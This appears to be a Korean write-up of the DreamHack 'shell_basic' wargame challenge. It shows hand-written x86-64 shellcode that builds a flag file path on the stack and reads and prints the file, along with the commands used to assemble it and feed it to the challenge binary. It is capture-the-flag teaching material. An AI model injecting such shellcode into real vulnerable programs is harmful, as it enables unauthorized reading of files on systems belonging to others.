[DreamHack워게임] shell_basic
작성자 정보
- za9uar 작성
https://dreamhack.io/wargame/challenges/410
일단 정석대로 asm만 사용해서 풀어보았음 (shellcraft 미사용)
Shell Code 문제 PoC
------------------------------------------------
; Open-read-write exercise for the shell_basic wargame challenge.
; Builds the flag path on the stack, opens it read-only, reads up to 0x30
; bytes into a buffer just below rsp, writes 0x30 bytes to stdout, and exits
; with status 0.
;
; Syntax: NASM (Intel operand order). Target: x86-64 Linux, raw syscalls.
; Syscall convention: rax = number, args in rdi, rsi, rdx; result in rax.
; Syscall numbers used: 0 = read, 1 = write, 2 = open, 0x3C (60) = exit.
;
; NOTE(review): no syscall result is checked. If open fails, rax holds a
; negative errno that is passed to read as the fd, and write still emits
; 0x30 bytes of whatever the buffer contains.
section .text
global _start
_start:
; Build the NUL-terminated path on the stack. The stack grows toward lower
; addresses, so the terminator and the last 8-byte piece are pushed first;
; each immediate is the piece's bytes in little-endian order.
mov rax, 0x0
push rax ; 8 zero bytes = string terminator
mov rax, 0x676E6F6F6F6F6F6F ; "oooooong"
push rax
mov rax, 0x6C5F73695F656D61 ; "ame_is_l"
push rax
mov rax, 0x6E5F67616C662F63 ; "c/flag_n"
push rax
mov rax, 0x697361625F6C6C65 ; "ell_basi"
push rax
mov rax, 0x68732F656D6F682F ; "/home/sh"
push rax
mov rdi, rsp ; rdi = path = "/home/shell_basic/flag_name_is_loooooong"
xor rsi, rsi ; rsi = flags = 0 (O_RDONLY)
xor rdx, rdx ; rdx = mode = 0 (unused without O_CREAT)
mov rax, 2 ; rax = 2 (open)
syscall ; open("/home/shell_basic/flag_name_is_loooooong", O_RDONLY, 0)
mov rdi, rax ; rdi = fd returned by open (not checked for error)
mov rsi, rsp
sub rsi, 0x30 ; rsi = buf = rsp-0x30; below rsp, inside the 128-byte red zone
mov rdx, 0x30 ; rdx = len = 0x30
mov rax, 0x0 ; rax = 0 (read)
syscall ; read(fd, buf, 0x30); byte count returned in rax is discarded
mov rdi, 1 ; rdi = fd = 1 (stdout)
mov rax, 0x1 ; rax = 1 (write); rsi and rdx still hold buf and 0x30
syscall ; write(1, buf, 0x30); always 0x30 bytes, whatever read returned
mov rax, 0x3C ; rax = 0x3C (exit)
mov rdi, 0 ; rdi = exit status 0
syscall ; exit(0)
------------------------------------------------
# Assemble the NASM source into a 64-bit ELF object file (write.o).
$ nasm -f elf64 write.asm
# Copy only the raw bytes of the .text section from write.o into write.bin.
$ objcopy --dump-section .text=write.bin write.o
# Hex-dump write.bin to inspect the extracted machine code.
$ xxd write.bin
# Feed the raw bytes to ./shell_basic on standard input
# (presumably a local copy of the challenge binary).
$ cat write.bin | ./shell_basic
※ 포인트
1. ASCII 문자열 끝은 NULL (경로 문자열의 끝을 표시하기 위해 0을 가장 먼저 push)
mov rax, 0x0
push rax
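2. Endian 변환 (x86-64는 little-endian이므로 문자열을 8바이트씩 나눠 바이트 순서를 뒤집은 값으로 push하고, 스택은 낮은 주소 방향으로 자라므로 문자열의 뒤쪽 조각부터 push)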
※ 참조 사이트
1) Ascii -> Hex : https://www.rapidtables.com/convert/number/ascii-to-hex.html
2) Endian 변환 : https://blockchain-academy.hs-mittweida.de/litte-big-endian-converter/